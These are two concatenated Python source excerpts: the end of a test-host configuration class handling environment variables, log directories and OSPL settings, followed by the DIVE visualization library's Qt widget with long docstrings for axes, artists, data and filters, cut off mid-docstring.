        """Check if host OS is Windows family"""
        return (self.config_map["OSName"].find("Win") != -1)
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def get_file_sep(self):
        """Returns the file path separator for this host"""
        return self.config_map["FileSep"]
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def get_path_sep(self):
        """Returns the path separator for this host"""
        return self.config_map["PathSep"]
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def get_line_sep(self):
        """Returns the line separator for this host"""
        return self.config_map["LineSep"]
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def get_os_name(self):
        """Returns a string describing the OS on this host"""
        return (self.config_map["OSName"] + " " +\
                self.config_map["OSMajorVersion"] + "." +\
                self.config_map["OSMinorVersion"] + "." +\
                self.config_map["OSRevision"])
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def set_ospl_uri(self, uri):
        """Set OSPL URI"""
        self.ospl.set_uri(uri)
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def get_ospl_uri(self):
        """Get OSPL URI"""
        return self.ospl.get_uri()
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def set_host_env(self, host_env):
        """Set the host system environment"""
        self.host_env = host_env
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def get_host_env(self):
        """Get the host system environment"""
        return self.host_env
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def get_env_value(self, name):
        """Get the host system environment by the name"""
        # NOTE(review): uses a substring match, so e.g. "PATH" also matches
        # "CLASSPATH=..." entries - presumably relied upon; confirm before
        # tightening to an exact-name match.
        value = ""
        for env in self.host_env:
            if env.find(name) != -1:
                value = env[env.find("=") + 1:]
                break
        return value
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def set_env_value(self, name, value):
        """Set the host system environment by the name"""
        # Remove the first matching entry (substring match, see
        # get_env_value), then append the new "NAME=value" string:
        for env in self.host_env:
            if env.find(name) != -1:
                self.host_env.remove(env)
                break
        self.host_env.append("%s=%s"% (name, value))
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def set_log_dir(self, log_dir):
        """Set the host log dir"""
        self.log_dir = log_dir
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def get_log_dir(self):
        """Get the host log dir"""
        return self.log_dir
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def translate_path(self, host_path, host_file_sep):
        """Translate FS path from another host's separator to this host's"""
        return host_path.replace(host_file_sep, self.get_file_sep())
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def get_process_by_name(self, name):
        """Get the host process by name, or None when not found"""
        for process in self.process_list:
            if name == process.get_name():
                return process
        return None
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def set_role(self, role):
        """Set the host role"""
        self.role = role
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def get_role(self):
        """Get the host role"""
        return self.role
    #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    def __str__(self):
        """Return a printable summary of the host, its OSPL command and processes"""
        string = "Host:\nhostname [%s]\nrole [%s]\ntest root [%s]\nOSPL_HOME [%s]\nlog dir [%s]\nSTAF URL [%s]\nENV %s\n"%\
                 (self.host_name,
                  self.role,
                  self.test_root,
                  self.ospl_home,
                  self.log_dir,
                  self.get_staf_url(),
                  self.host_env)
        string += "-----\n"
        string += str(self.ospl)
        for process in self.process_list:
            string += "-----\n"
            string += str(process)
        return string
|
<reponame>Dive576/DIVE
from ._components.dive_manager import DIVEManager as _DIVEManager
import importlib as _importlib
import vispy as _vp
# Resolve which Qt binding (e.g. 'PyQt5', 'PySide2') vispy selected as its
# backend, then import that binding's QtCore/QtWidgets modules dynamically.
qt = _vp.app.use_app().backend_name
try:
    _qtcore = _importlib.import_module('{}.QtCore'.format(qt))
    _qtwidgets = _importlib.import_module('{}.QtWidgets'.format(qt))
except:
    # NOTE(review): bare except silently swallows a failed Qt import, leaving
    # _qtcore/_qtwidgets undefined so later references raise NameError -
    # presumably intentional "Qt is optional" behaviour; confirm.
    pass
else:
    # Imports succeeded: drop the temporary backend-name binding so it does
    # not linger in the module namespace.
    del qt
class DIVEWidget(_qtwidgets.QWidget):
"""
The main Qt widget for DIVE.
Parameters
----------
unit_reg : None, pint.UnitRegistry (Default: None)
The unit registry to use for unit conversions.
If None, the default UnitRegistry in pint will be used.
Only valid if the "pint" module has been installed.
*args
Any parameters that are accepted by a QWidget.
**kwargs
Any keyword parameters that are accepted by a QWidget.
Signals
-------
current_time_changed
This signal is sent whenever the current time changes in DIVE.
"""
current_time_changed = _qtcore.pyqtSignal() if hasattr(_qtcore, 'pyqtSignal') else _qtcore.Signal()
def __init__(self, unit_reg=None, *args, **kwargs):
super().__init__(*args,**kwargs)
self.setWindowTitle('Data Interface for Visual Exploration')
self._dive_manager = _DIVEManager(self, unit_reg)
def add_arrow_artist(self, axis_name, name, data_name, x_field, y_field, z_field=None, label_field=None, label_size=10, visible=True, draw_order=0, label_draw_order=0, legend_text=None, selectable=True,
line_width=1, line_color='r', line_color_field=None, line_colormap='viridis', line_color_label=None, line_color_unit=None,
arrow_shape='stealth', arrow_spacing=0, show_last_arrow=True, arrow_size=10,
arrow_color='g', arrow_color_field=None, arrow_colormap='viridis', arrow_color_label=None, arrow_color_unit=None):
"""
Add an arrow artist to an axis in DIVE.
Parameters
----------
axis_name : str
The name of the axis that this artist should be added to.
name : str
The name of this artist.
data_name : str
The name of the data object to use for this artist.
x_field : str
The name of the field in the data object that contains the x coordinates for this artist.
y_field : str
The name of the field in the data object that contains the y coordinates for this artist.
z_field : None, str (Default: None)
The name of the field in the data object that contains the z coordinates for this artist.
If None, this artist will be two-dimensional.
label_field : None, str (Default: None)
The name of the field in the data object that contains labels for each data point.
If None, labels will not be shown.
label_size : numeric (Default: 10)
The font size to use for labels.
visible : bool (Default: True)
Toggle whether this artist is visible.
draw_order : numeric (Default: 0)
The number used to determine the draw order for this artist.
Artists with small "draw_order" values are drawn before artists with large "draw_order" values.
label_draw_order : numeric (Default: 0)
The number used to determine the draw order for labels.
legend_text : None, str (Default: None)
The label to display in the legend for this artist.
If None, this artist will not appear in the legend.
selectable : bool (Default: True)
Toggle whether this artist is selectable.
line_width : numeric (Default: 1)
The width of the lines.
If 0, lines are not shown.
line_color : str (Default: "r")
The color to use for the lines.
It must be either a hex string (such as "#ff0000") or the name of a CSS color.
Only used if "line_color_field" is None.
line_color_field: None, str (Default: None)
The name of the field in the data object that contains color values for the lines.
line_colormap: str (Default: "viridis")
The name of the colormap to use for the lines.
Only used if "line_color_field" is not None.
line_color_label: None, str (Default: None)
The label to use for line color values on the colorbar.
Only used if "line_color_field" is not None.
line_color_unit: None, array (Default: None)
The unit to use for line color values on the colorbar.
If array, it must have the format: [from_unit, to_unit]
Only "pint" units are valid.
Only used if "line_color_field" is not None.
arrow_shape: str (Default: "stealth")
The shape to use for the arrow heads.
arrow_spacing: int (Default: 0)
The number of data points between each arrow head.
If 0, arrow heads will only be shown for the last data point.
show_last_arrow: bool (Default: True)
Toggle display of last arrow head even if "arrow_spacing" would exclude it.
Only used if "arrow_spacing" is not 0.
arrow_size: numeric (Default: 10)
The size of the arrow heads.
arrow_color : str (Default: "g")
The color to use for the arrow heads.
It must be either a hex string (such as "#ff0000") or the name of a CSS color.
Only used if "arrow_color_field" is None.
arrow_color_field: None, str (Default: None)
The name of the field in the data object that contains color values for the arrow heads.
arrow_colormap: str (Default: "viridis")
The name of the colormap to use for the arrow heads.
Only used if "arrow_color_field" is not None.
arrow_color_label: None, str (Default: None)
The label to use for arrow head color values on the colorbar.
Only used if "arrow_color_field" is not None.
arrow_color_unit: None, array (Default: None)
The unit to use for arrow head color values on the colorbar.
If array, it must have the format: [from_unit, to_unit]
Only "pint" units are valid.
Only used if "arrow_color_field" is not None.
Notes
-----
If the data object has an ID field, lines will only connect points with the same ID.
When multiple color fields are in use in an axis (either in a single artist or across multiple artists),
all color fields that have the same colormap, color_label, and color_unit will share the same colorbar.
All colorbar values that aren't numeric or timestamps (with tz),
will instead be displayed in the legend (as long as "legend_text" is not None).
It is possible to cycle through the colorbars in an axis by clicking on the colorbar.
"""
self._dive_manager.add_artist(axis_name, 'arrow', dict(name=name, data_name=data_name, x_field=x_field, y_field=y_field, z_field=z_field, label_field=label_field, label_size=label_size, visible=visible, draw_order=draw_order, label_draw_order=label_draw_order, legend_text=legend_text, selectable=selectable,
line_width=line_width, line_color=line_color, line_color_field=line_color_field, line_colormap=line_colormap, line_color_label=line_color_label, line_color_unit=line_color_unit,
arrow_shape=arrow_shape, arrow_spacing=arrow_spacing, show_last_arrow=show_last_arrow, arrow_size=arrow_size,
arrow_color=arrow_color, arrow_color_field=arrow_color_field, arrow_colormap=arrow_colormap, arrow_color_label=arrow_color_label, arrow_color_unit=arrow_color_unit))
    def add_axis(self, name, axis_type, title=None, x_grid=True, y_grid=True, z_grid=True, x_label=None, y_label=None, z_label=None, x_unit=None, y_unit=None, z_unit=None, time_autoscale=False):
        """
        Add an axis to DIVE.
        Parameters
        ----------
        name : str
            The name to use for this axis.
        axis_type : str
            The type of view this axis provides.
            Allowed values are: "2d", "3d"
        title : None, str (Default: None)
            The title to show above this axis.
        x_grid : bool (Default: True)
            Toggle whether the x-axis grid lines are displayed.
        y_grid : bool (Default: True)
            Toggle whether the y-axis grid lines are displayed.
        z_grid : bool (Default: True)
            Toggle whether the z-axis grid lines are displayed.
        x_label : None, str (Default: None)
            The label to show for the x-axis.
        y_label : None, str (Default: None)
            The label to show for the y-axis.
        z_label : None, str (Default: None)
            The label to show for the z-axis.
        x_unit : None, array (Default: None)
            The unit to use for the x-axis.
            If array, it must have the format: [from_unit, to_unit]
            Only "pint" units are valid.
        y_unit : None, array (Default: None)
            The unit to use for the y-axis.
            If array, it must have the format: [from_unit, to_unit]
            Only "pint" units are valid.
        z_unit : None, array (Default: None)
            The unit to use for the z-axis.
            If array, it must have the format: [from_unit, to_unit]
            Only "pint" units are valid.
        time_autoscale : bool (Default: False)
            Toggle whether the axis limits should be scaled to fit the current
            data values when the current time value is updated in DIVE.
        Notes
        -----
        If the "pint" module hasn't been installed, the unit parameters will be ignored.
        """
        # Forward the axis definition to the manager.
        self._dive_manager.add_axis(dict(name=name, axis_type=axis_type, title=title, x_grid=x_grid, y_grid=y_grid, z_grid=z_grid, x_label=x_label, y_label=y_label, z_label=z_label, x_unit=x_unit, y_unit=y_unit, z_unit=z_unit, time_autoscale=time_autoscale))
def add_axis_group(self, name, row_count, column_count, axis_names, rows, columns, row_spans, column_spans):
"""
Add an axis group to DIVE.
Parameters
----------
name : str
The name to use for this axis group.
row_count : int
The number of rows that this axis group should have.
column_count : int
The number of columns that this axis group should have.
axis_names : array
The names of the axes that this axis group should display.
rows : array
The row indices for the axes specified by "axis_names".
columns : array
The column indices for the axes specified by "axis_names".
row_spans : array
The number of rows that the axes specified by "axis_names" should span.
column_spans : array
The number of columns that the axes specified by "axis_names" should span.
"""
self._dive_manager.add_axis_group(dict(name=name, row_count=row_count, column_count=column_count, axis_names=axis_names, rows=rows, columns=columns, row_spans=row_spans, column_spans=column_spans))
def add_box_artist(self, axis_name, name, data_name=None, visible=True, draw_order=0, legend_text=None, x_pos=0, x_pos_field=None, y_pos=0, y_pos_field=None, z_pos=0, z_pos_field=None, width=1, width_field=None, height=1, height_field=None, depth=1, depth_field=None, color='g', color_field=None, colormap='viridis', color_label=None, color_unit=None, faces='XxYyZz'):
"""
Add a box artist to an axis in DIVE.
Parameters
----------
axis_name : str
The name of the axis that this artist should be added to.
name : str
The name of this artist.
data_name : None, str (Default: None)
The name of the data object to use for this artist.
visible : bool (Default: True)
Toggle whether this artist is visible.
draw_order : numeric (Default: 0)
The number used to determine the draw order for this artist.
Artists with small "draw_order" values are drawn before artists with large "draw_order" values.
legend_text : None, str (Default: None)
The label to display in the legend for this artist.
If None, this artist will not appear in the legend.
x_pos : numeric (Default: 0)
The position of the box center along the x-axis.
x_pos_field : None, str (Default: None)
The name of the field in the data object that contains the positions of the box center along the x-axis.
y_pos : numeric (Default: 0)
The position of the box center along the y-axis.
y_pos_field : None, str (Default: None)
The name of the field in the data object that contains the positions of the box center along the y-axis.
z_pos : numeric (Default: 0)
The position of the box center along the z-axis.
z_pos_field : None, str (Default: None)
The name of the field in the data object that contains the positions of the box center along the z-axis.
width : numeric (Default: 1)
The width of the box.
width_field : None, str (Default: None)
The name of the field in the data object that contains width values of the box.
height : numeric (Default: 1)
The height of the box.
height_field : None, str (Default: None)
The name of the field in the data object that contains height values of the box.
depth : numeric (Default: 1)
The depth of the box.
depth_field : None, str (Default: None)
The name of the field in the data object that contains depth values of the box.
color : str (Default: "g")
The color to use for the box.
It must be either a hex string (such as "#ff0000") or the name of a CSS color.
Only used if "color_field" is None.
color_field: None, str (Default: None)
The name of the field in the data object that contains color values for the box.
colormap: str (Default: "viridis")
The name of the colormap to use for the box.
Only used if "color_field" is not None.
color_label: None, str (Default: None)
The label to use for box color values on the colorbar.
Only used if "color_field" is not None.
color_unit: None, array (Default: None)
The unit to use for box color values on the colorbar.
If array, it must have the format: [from_unit, to_unit]
Only "pint" units are valid.
Only used if "color_field" is not None.
faces : str (Default: 'XxYyZz')
The faces of the box to display. Accepts lowercase and uppercase combinations of 'x', 'y', and 'z'.
Lowercase indicates negative side and uppercase indicates positive side.
Notes
-----
When multiple color fields are in use in an axis (either in a single artist or across multiple artists),
all color fields that have the same colormap, color_label, and color_unit will share the same colorbar.
All colorbar values that aren't numeric or timestamps (with tz),
will instead be displayed in the legend (as long as "legend_text" is not None).
It is possible to cycle through the colorbars in an axis by clicking on the colorbar.
"""
self._dive_manager.add_artist(axis_name, 'box', dict(name=name, data_name=data_name, visible=visible, draw_order=draw_order, legend_text=legend_text, x_pos=x_pos, x_pos_field=x_pos_field, y_pos=y_pos, y_pos_field=y_pos_field, z_pos=z_pos, z_pos_field=z_pos_field, width=width, width_field=width_field, height=height, height_field=height_field, depth=depth, depth_field=depth_field, color=color, color_field=color_field, colormap=colormap, color_label=color_label, color_unit=color_unit, faces=faces))
def add_data(self, name, data, id_field=None, time_field=None, selection=None):
"""
Add a data object to DIVE.
Parameters
----------
name : str
The name to use for this data object.
data : pandas.DataFrame
The data to store in this data object.
All column names must be strings.
id_field : None, str (Default: None)
The name of the field in "data" that contains the ID for each row.
time_field : None, str (Default: None)
The name of the field in "data" that contains the timestamp for each row.
There are two valid types of time values in DIVE: numeric (not complex) and pandas.Timestamp with tz.
The timestamps must be monotonic increasing.
selection : None, array (Default: None)
The indices in "data" that should be selected.
Notes
-----
If the time value data type is not consistent across all data objects (excluding None),
then the animation controls will not be available in DIVE.
"""
self._dive_manager.add_data(dict(name=name, data=data, id_field=id_field, time_field=time_field, selection=selection))
    def add_ellipse_artist(self, axis_name, name, data_name=None, visible=True, draw_order=0, legend_text=None, start_angle=0, start_angle_field=None, span_angle=360, span_angle_field=None, x_pos=0, x_pos_field=None, y_pos=0, y_pos_field=None, edge_width=0, edge_width_field=None, x_radius=0.5, x_radius_field=None, y_radius=0.5, y_radius_field=None, color='g', color_field=None, colormap='viridis', color_label=None, color_unit=None, edge_color='g', edge_color_field=None, edge_colormap='viridis', edge_color_label=None, edge_color_unit=None):
        """
        Add an ellipse artist to an axis in DIVE.
        Parameters
        ----------
        axis_name : str
            The name of the axis that this artist should be added to.
        name : str
            The name of this artist.
        data_name : None, str (Default: None)
            The name of the data object to use for this artist.
        visible : bool (Default: True)
            Toggle whether this artist is visible.
        draw_order : numeric (Default: 0)
            The number used to determine the draw order for this artist.
            Artists with small "draw_order" values are drawn before artists with large "draw_order" values.
        legend_text : None, str (Default: None)
            The label to display in the legend for this artist.
            If None, this artist will not appear in the legend.
        start_angle : numeric (Default: 0)
            The counter clockwise starting angle of the ellipse in degrees.
        start_angle_field : None, str (Default: None)
            The name of the field in the data object that contains counter clockwise starting angles of the ellipse in degrees.
        span_angle : numeric (Default: 360)
            The angular region of the ellipse to display in degrees.
        span_angle_field : None, str (Default: None)
            The name of the field in the data object that contains angular regions of the ellipse to display in degrees.
        x_pos : numeric (Default: 0)
            The position of the ellipse center along the x-axis.
        x_pos_field : None, str (Default: None)
            The name of the field in the data object that contains the positions of the ellipse center along the x-axis.
        y_pos : numeric (Default: 0)
            The position of the ellipse center along the y-axis.
        y_pos_field : None, str (Default: None)
            The name of the field in the data object that contains the positions of the ellipse center along the y-axis.
        edge_width : numeric (Default: 0)
            The width of the ellipse edges.
            If 0, the ellipse edges are not shown.
        edge_width_field : None, str (Default: None)
            The name of the field in the data object that contains width values of the ellipse edges.
        x_radius : numeric (Default: 0.5)
            The radius of the ellipse along the x-axis.
        x_radius_field : None, str (Default: None)
            The name of the field in the data object that contains radius values of the ellipse along the x-axis.
        y_radius : numeric (Default: 0.5)
            The radius of the ellipse along the y-axis.
        y_radius_field : None, str (Default: None)
            The name of the field in the data object that contains radius values of the ellipse along the y-axis.
        color : str (Default: "g")
            The color to use for the ellipse.
            It must be either a hex string (such as "#ff0000") or the name of a CSS color.
            Only used if "color_field" is None.
        color_field: None, str (Default: None)
            The name of the field in the data object that contains color values for the ellipse.
        colormap: str (Default: "viridis")
            The name of the colormap to use for the ellipse.
            Only used if "color_field" is not None.
        color_label: None, str (Default: None)
            The label to use for ellipse color values on the colorbar.
            Only used if "color_field" is not None.
        color_unit: None, array (Default: None)
            The unit to use for ellipse color values on the colorbar.
            If array, it must have the format: [from_unit, to_unit]
            Only "pint" units are valid.
            Only used if "color_field" is not None.
        edge_color : str (Default: "g")
            The color to use for the ellipse edges.
            It must be either a hex string (such as "#ff0000") or the name of a CSS color.
            Only used if "edge_color_field" is None.
        edge_color_field: None, str (Default: None)
            The name of the field in the data object that contains color values for the ellipse edges.
        edge_colormap: str (Default: "viridis")
            The name of the colormap to use for the ellipse edges.
            Only used if "edge_color_field" is not None.
        edge_color_label: None, str (Default: None)
            The label to use for ellipse edge color values on the colorbar.
            Only used if "edge_color_field" is not None.
        edge_color_unit: None, array (Default: None)
            The unit to use for ellipse edge color values on the colorbar.
            If array, it must have the format: [from_unit, to_unit]
            Only "pint" units are valid.
            Only used if "edge_color_field" is not None.
        Notes
        -----
        When multiple color fields are in use in an axis (either in a single artist or across multiple artists),
        all color fields that have the same colormap, color_label, and color_unit will share the same colorbar.
        All colorbar values that aren't numeric or timestamps (with tz),
        will instead be displayed in the legend (as long as "legend_text" is not None).
        It is possible to cycle through the colorbars in an axis by clicking on the colorbar.
        """
        # Forward the artist definition to the manager.
        self._dive_manager.add_artist(axis_name, 'ellipse', dict(name=name, data_name=data_name, visible=visible, draw_order=draw_order, legend_text=legend_text, start_angle=start_angle, start_angle_field=start_angle_field, span_angle=span_angle, span_angle_field=span_angle_field, x_pos=x_pos, x_pos_field=x_pos_field, y_pos=y_pos, y_pos_field=y_pos_field, edge_width=edge_width, edge_width_field=edge_width_field, x_radius=x_radius, x_radius_field=x_radius_field, y_radius=y_radius, y_radius_field=y_radius_field, color=color, color_field=color_field, colormap=colormap, color_label=color_label, color_unit=color_unit, edge_color=edge_color, edge_color_field=edge_color_field, edge_colormap=edge_colormap, edge_color_label=edge_color_label, edge_color_unit=edge_color_unit))
def add_filter_custom(self, name, values, enabled=True):
"""
Add a custom filter group to DIVE.
Parameters
----------
name : str
The name to use for this custom filter group.
values : dict
The indices to use in this custom filter group.
Each dictionary key should be the name of a data object
and each dictionary value should be an array of boolean values.
enabled : bool (Default: True)
Toggle usage of this custom filter group.
"""
self._dive_manager.add_filter('custom', dict(name=name, values=values, enabled=enabled))
    def add_filter_id(self, name, values, enabled=True):
        """
        Add an ID filter group to DIVE.
        Parameters
        ----------
        name : str
            The name to use for this ID filter group.
        values : dict
            The indices to use in this ID filter group.
            Each dictionary key should be the name of a data object
            and each dictionary value should be an array of ID values.
        enabled : bool (Default: True)
            Toggle usage of this ID filter group.
        """
        # Forward the filter definition to the manager.
        self._dive_manager.add_filter('ID', dict(name=name, values=values, enabled=enabled))
def add_filter_value(self, name, data_names, filters=['AND'], id_filter=None, enabled=True):
"""
Add a value filter group to DIVE.
Parameters
----------
name : str
The name to use for this value filter group.
data_names : array
The names of the data objects to apply this value filter group to.
filters : array (Default: ["AND"])
The filters to apply to each data object specified by "data_names".
Filtering involves two kinds of items: filter items and logical items.
Filter items are an array with the format: [comparison_op, data_name, field_name, comparison_value]
Allowed values for the comparison_op are: ">", ">=", "==", "!=", "<=", "<"
Logical items are an array with the format: [logical_op, ...]
Allowed values for the logical_op are: "AND", "OR"
Both types of items can be added after the logical_op and the logical_op will be applied to the results of all of the subitems.
id_filter : None, str (Default: None)
The value specifying whether the output of this value filter group should be used to filter each data's ID field.
If None, ID filtering will not occur.
If "any match", a data ID value is kept if at least one occurrence of it is in the value filter groups's output.
If "all match", a data ID value is kept if all occurrences of it are in the value filter groups's output.
If "any mismatch", a data ID value is kept if at least one occurrence of it was filtered out.
If "all mismatch", a data ID value is kept if all occurrences of it were filtered out.
enabled : bool (Default: True)
Toggle usage of this value filter group.
"""
self._dive_manager.add_filter('value', dict(name=name, data_names=data_names, filters=filters, id_filter=id_filter, enabled=enabled))
def add_image_artist(self, axis_name, name, data_name, color_field, visible=True, draw_order=0, legend_text=None, x_pos=0, x_pos_field=None, y_pos=0, y_pos_field=None, width=1, width_field=None, height=1, height_field=None, colormap='viridis', color_label=None, color_unit=None, interpolation='Nearest'):
"""
Add an image artist to an axis in DIVE.
Parameters
----------
axis_name : str
The name of the axis that this artist should be added to.
name : str
The name of this artist.
data_name : str
The name of the data object to use for this artist.
color_field: str
The name of the field in the data object that contains color values for the image.
Every value in this field must be a 2D numpy.ndarray.
visible : bool (Default: True)
Toggle whether this artist is visible.
draw_order : numeric (Default: 0)
The number used to determine the draw order for this artist.
Artists with small "draw_order" values are drawn before artists with large "draw_order" values.
legend_text : None, str (Default: None)
The label to display in the legend for this artist.
If None, this artist will not appear in the legend.
x_pos : numeric (Default: 0)
The position of the image center along the x-axis.
x_pos_field : None, str (Default: None)
The name of the field in the data object that contains the positions of the image center along the x-axis.
y_pos : numeric (Default: 0)
The position of the image center along the y-axis.
y_pos_field : None, str (Default: None)
The name of the field in the data object that contains the positions of the image center along the y-axis.
width : numeric (Default: 1)
The width of the image.
width_field : None, str (Default: None)
The name of the field in the data object that contains width values of the image.
height : numeric (Default: 1)
The height of the image.
height_field : None, str (Default: None)
The name of the field in the data object that contains height values of the image.
colormap: str (Default: "viridis")
The name of the colormap to use for the image.
Only used if "color_field" is not None.
color_label: None, str (Default: None)
The label to use for image color values on the colorbar.
Only used if "color_field" is not None.
color_unit: None, array (Default: None)
The unit to use for image color values on the colorbar.
If array, it must have the format: [from_unit, to_unit]
Only "pint" units are valid.
Only used if "color_field" is not None.
interpolation : str (Default: "Nearest")
The interpolation method to use for the image.
Allowed values are: 'Bessel', 'Bicubic', 'Bilinear', 'Blackman', 'CatRom', 'Gaussian', 'Hamming', 'Hanning', 'Hermite', 'Kaiser', 'Lanczos', 'Mitchell', 'Nearest', 'Quadric', 'Sinc', 'Spline16', 'Spline36'
Notes
-----
When multiple color fields are in use in an axis (either in a single artist or across multiple artists),
all color fields that have the same colormap, color_label, and color_unit will share the same colorbar.
All colorbar values that aren't numeric or timestamps (with tz),
will instead be displayed in the legend (as long as "legend_text" is not None).
It is possible to cycle through the colorbars in an axis by clicking on the colorbar.
"""
self._dive_manager.add_artist(axis_name, 'image', dict(name=name, data_name=data_name, color_field=color_field, visible=visible, draw_order=draw_order, legend_text=legend_text, x_pos=x_pos, x_pos_field=x_pos_field, y_pos=y_pos, y_pos_field=y_pos_field, width=width, width_field=width_field, height=height, height_field=height_field, colormap=colormap, color_label=color_label, color_unit=color_unit, interpolation=interpolation))
def add_infinite_line_artist(self, axis_name, name, data_name=None, visible=True, draw_order=0, legend_text=None, pos=0, pos_field=None, color='r', color_field=None, colormap='viridis', color_label=None, color_unit=None, is_vertical=True):
"""
Add an infinite line artist to an axis in DIVE.
Parameters
----------
axis_name : str
The name of the axis that this artist should be added to.
name : str
The name of this artist.
data_name : None, str (Default: None)
The name of the data object to use for this artist.
visible : bool (Default: True)
Toggle whether this artist is visible.
draw_order : numeric (Default: 0)
The number used to determine the draw order for this artist.
Artists with small "draw_order" values are drawn before artists with large "draw_order" values.
legend_text : None, str (Default: None)
The label to display in the legend for this artist.
If None, this artist will not appear in the legend.
pos : numeric (Default: 0)
The position of the line along the x/y-axis.
pos_field : None, str (Default: None)
The name of the field in the data object that contains the positions of the line along the x/y-axis.
color : str (Default: "r")
The color to use for the line.
It must be either a hex string (such as "#ff0000") or the name of a CSS color.
Only used if "color_field" is None.
color_field: None, str (Default: None)
The name of the field in the data object that contains color values for the line.
colormap: str (Default: "viridis")
The name of the colormap to use for the line.
Only used if "color_field" is not None.
color_label: None, str (Default: None)
The label to use for line color values on the colorbar.
Only used if "color_field" is not None.
color_unit: None, array (Default: None)
The unit to use for line color values on the colorbar.
If array, it must have the format: [from_unit, to_unit]
Only "pint" units are valid.
Only used if "color_field" is not None.
is_vertical : bool (Default: True)
Toggle whether the line is vertical (on the x-axis).
Notes
-----
When multiple color fields are in use in an axis (either in a single artist or across multiple artists),
all color fields that have the same colormap, color_label, and color_unit will share the same colorbar.
All colorbar values that aren't numeric or timestamps (with tz),
will instead be displayed in the legend (as long as "legend_text" is not None).
It is possible to cycle through the colorbars in an axis by clicking on the colorbar.
"""
self._dive_manager.add_artist(axis_name, 'infinite line', dict(name=name, data_name=data_name, visible=visible, draw_order=draw_order, legend_text=legend_text, pos=pos, pos_field=pos_field, color=color, color_field=color_field, colormap=colormap, color_label=color_label, color_unit=color_unit, is_vertical=is_vertical))
def add_polygon_artist(self, axis_name, name, data_name, x_field, y_field, visible=True, draw_order=0, legend_text=None, edge_width=0, edge_width_field=None, color='g', color_field=None, colormap='viridis', color_label=None, color_unit=None, edge_color='g', edge_color_field=None, edge_colormap='viridis', edge_color_label=None, edge_color_unit=None):
"""
Add a polygon artist to an axis in DIVE.
Parameters
----------
axis_name : str
The name of the axis that this artist should be added to.
name : str
The name of this artist.
data_name : str
The name of the data object to use for this artist.
x_field : str
The name of the field in the data object that contains the x coordinates for this artist.
Every value in this field must be a 1D numpy.ndarray.
y_field : str
The name of the field in the data object that contains the y coordinates for this artist.
Every value in this field must be a 1D numpy.ndarray.
visible : bool (Default: True)
Toggle whether this artist is visible.
draw_order : numeric (Default: 0)
The number used to determine the draw order for this artist.
Artists with small "draw_order" values are drawn before artists with large "draw_order" values.
legend_text : None, str (Default: None)
The label to display in the legend for this artist.
If None, this artist will not appear in the legend.
edge_width : numeric (Default: 0)
The width of the polygon edges.
If 0, the polygon edges are not shown.
edge_width_field : None, str (Default: None)
The name of the field in the data object that contains width values of the polygon edges.
color : str (Default: "g")
The color to use for the polygon.
It must be either a hex string (such as "#ff0000") or the name of a CSS color.
Only used if "color_field" is None.
color_field: None, str (Default: None)
The name of the field in the data object that contains color values for the polygon.
colormap: str (Default: "viridis")
The name of the colormap to use for the polygon.
Only used if "color_field" is not None.
color_label: None, str (Default: None)
The label to use for polygon color values on the colorbar.
Only used if "color_field" is not None.
color_unit: None, array (Default: None)
The unit to use for polygon color values on the colorbar.
If array, it must have the format: [from_unit, to_unit]
Only "pint" units are valid.
Only used if "color_field" is not None.
edge_color : str (Default: "g")
The color to use for the polygon edges.
It must be either a hex string (such as "#ff0000") or the name of a CSS color.
Only used if "edge_color_field" is None.
edge_color_field: None, str (Default: None)
The name of the field in the data object that contains color values for the polygon edges.
edge_colormap: str (Default: "viridis")
The name of the colormap to use for the polygon edges.
Only used if "edge_color_field" is not None.
edge_color_label: None, str (Default: None)
The label to use for polygon edge color values on the colorbar.
Only used if "edge_color_field" is not None.
edge_color_unit: None, array (Default: None)
The unit to use for polygon edge color values on the colorbar.
If array, it must have the format: [from_unit, to_unit]
Only "pint" units are valid.
Only used if "edge_color_field" is not None.
Notes
-----
When multiple color fields are in use in an axis (either in a single artist or across multiple artists),
all color fields that have the same colormap, color_label, and color_unit will share the same colorbar.
All colorbar values that aren't numeric or timestamps (with tz),
will instead be displayed in the legend (as long as "legend_text" is not None).
It is possible to cycle through the colorbars in an axis by clicking on the colorbar.
"""
self._dive_manager.add_artist(axis_name, 'polygon', dict(name=name, data_name=data_name, x_field=x_field, y_field=y_field, visible=visible, draw_order=draw_order, legend_text=legend_text, edge_width=edge_width, edge_width_field=edge_width_field, color=color, color_field=color_field, colormap=colormap, color_label=color_label, color_unit=color_unit, edge_color=edge_color, edge_color_field=edge_color_field, edge_colormap=edge_colormap, edge_color_label=edge_color_label, edge_color_unit=edge_color_unit))
def add_rectangle_artist(self, axis_name, name, data_name=None, visible=True, draw_order=0, legend_text=None, x_pos=0, x_pos_field=None, y_pos=0, y_pos_field=None, edge_width=0, edge_width_field=None, width=1, width_field=None, height=1, height_field=None, color='g', color_field=None, colormap='viridis', color_label=None, color_unit=None, edge_color='g', edge_color_field=None, edge_colormap='viridis', edge_color_label=None, edge_color_unit=None):
    """
    Add a rectangle artist to an axis in DIVE.

    Parameters
    ----------
    axis_name : str
        The name of the axis that this artist should be added to.
    name : str
        The name of this artist.
    data_name : None, str (Default: None)
        The name of the data object to use for this artist.
    visible : bool (Default: True)
        Toggle whether this artist is visible.
    draw_order : numeric (Default: 0)
        The number used to determine the draw order for this artist.
